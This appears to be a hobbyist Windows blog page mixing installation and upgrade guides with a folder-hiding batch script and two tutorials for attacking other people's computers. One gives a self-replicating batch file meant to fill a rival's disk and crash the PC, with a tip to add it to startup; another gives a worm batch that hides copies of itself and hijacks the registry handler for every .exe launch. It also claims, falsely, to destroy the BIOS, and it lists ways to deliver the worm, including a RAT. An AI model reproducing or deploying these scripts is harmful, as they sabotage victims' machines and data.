Showing posts with label windows. Show all posts

How to Format your PC and install new OS (Windows XP )

1. Open your computer and open you cd/dvd rom and put in your bootable cd/dvd of your chosen operating system, then restart your computer.

2. While the computer reboots, you will see this image on your screen.

3. Press any key or Enter, spacebar, or anything you like, then wait (you will see this message "setup is inspecting your system configuration..."), don't do anything until it comes to this page: (Windows Setup, setup is loading files page )

4. EULA (end-user license agreement) page will appear then press F8 to agree and continue the setup.

5. A page will appear that displays the existing operating system installed on your pc, then press ENTER as stated below to continue setup.

6. The screen will show the different partitions on your computer and it will look like the image below, highlight the partition named C: by following the instructions below the screen on how to select an option, then again press ENTER to setup windows on the selected partition.

7. There will be four options that will be displayed, choose FORMAT THE PARTITION USING NTFS FILE SYSTEM or you can choose the first option FORMAT THE PARTITION USING NTFS FILE SYSTEM (QUICK), then press ENTER again to continue setup.

8. Then wait until setup formats the partition.

9. After formatting, wait again until setup finishes copying files to windows folders, this may take minutes.

10. After copying of files, the setup will now reboot to continue the installation, wait 15 seconds and it will automatically reboot, or press ENTER if you can not wait 15 seconds.

11. The computer will reboot and wait until setups continues, you will see the image below and wait for about 30 to 45 minutes for setup to finish installation.

12. You have now successfully formatted your computer and a fresh copy of windows is installed.

Upgrade Windows 7 using Windows Anytime Upgrade

Upgrade Windows 7 using Windows Anytime Upgrade

Click on Start, then type in anytime upgrade into the search box and click on Windows Anytime Upgrade to get started.

Now just follow the instructions to upgrade to a new edition of Windows 7. First, click on Go online to choose the edition of Windows 7 that is best for you.

In the same dialog, you’ll get a list of the different versions along with a nice table of features for each. This is also a great way to compare the different versions of Windows 7 and actually see what the differences are.

You can also click on the tabs across the top to see the features of each version separately. Once you buy a new version and have an upgrade key, click on Enter an upgrade key.

And that’s pretty much it! After you enter your key, Microsoft will confirm it and all the new features of the higher edition will be available immediately! No need to download anything or install any extra software. Enjoy!

Working Windows 7 Ultimate Anytime Upgrade Key:


Working Windows 7 Home Premium Anytime Upgrade Key:


How to Destroy your Rivals Computer using a Batch File

I just created the following batch file and ran it on myself and am SUPER glad i shut my computer off, because this batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.

let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).


@echo off
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat

 i am not responsible for anyone who decide to run this code.

How to lock folders by only using notepad

Hello guys, on this tutorial I will be showing you how to lock folders with a simple batch script.

Open Notepad from your Start -> All Programs -> Accessories -> Notepad

Step 1: Open notepad and copy and paste in this code

title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End

Step 2: Once the code in notepad save it as "FloderLock.bat"

Step 3: You should now have a .bat file called "Folderlock" double click on it and within a second a new folder called "Locker" Should have been created. Now drop all the files you want like to lock away in "Locker"

Step 4: When you've gotten all the files you want into lock away in "Locker" now to lock it, double click on "FolderLock.bat" and type "Y" when the command prompt comes up. Your folder will now be locked and will disappear.

Step 5: To unlock the folder click on "FolderLock.bat' when the command prompt comes up type "Y". The folder "Locker" and all it's documents should be back in the same directory as "FolderLock"

Hope this tutorial will help out some new and old members. 

How to Permanently Kill someones PC


Now, there is no going back from executing this batch code. Once executed it will rewrite the BIOS and a few other core clocks rendering the motherboard useless. The only way to come back after a execution of this code is to buy a new motherboard.

Lets get started

Step One: Open notepad or anything similar.

Step Two: Paste the following code into notepad

@echo off & break off
://associate .pic as batfile for camouflaggin
assoc .pic=batfile

://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic

://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username%.pic ""\%1\"" %* /f

://starting payload mwahaha
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo 123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx &echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo 123>REDIR &echo 123>KBD &echo 123>SYSTEM
 Step Three: Save the file as a .bat like so....

How to use the batch

Now there are a few ways you can run this batch on someones computer.

1. Just simply give them the batch file

2. Use a RAT program like darkcomet and run it through the batch script executer.

3. You could place it on a usb drive and manually execute it.

How to install Windows 8

First of all Go to Microsoft's Web site and download Windows 8 ISO image of 2.5 GB

[Image: inline-2-windows-8-logo-pgram.jpg]

Screenshot of Windows 8 installation [ In this step choose the language, time and currency format, and choose Keyboard or Input method.]

[Image: win8-2-4f4e455-intro.png]

Click on NEXT...

[Image: win8-3-4f4e455-intro.png]

Click on Install now...
Then Next you have Windows 8 will give you two options to choose
1. Upgrade
2. Custom (advanced)

[Image: win8-6-4f4e456-intro.png]

In this step Click on Custom

[Image: Default-VHD.jpg]

In this step Windows will ask you to target destination [Where do you want install Win 8]

[Image: win8-8-4f4e456-intro.png]

In this step windows starts installation on the drive, it takes few minutes install.

[Image: personalization_1.jpg]

Time to personalize the start screen and choose a color and give name to your PC

[Image: personalization_2.jpg]

Click on Express settings or Customize

[Image: personalization_3.jpg]

This is the new feature on Windows 8 it asks to sign in with Microsoft Live ID, if you have a MS live account then sign otherwise click on SKIP.

[Image: personalization_4.jpg]

Finalizing your Settings ...

[Image: Final.jpg]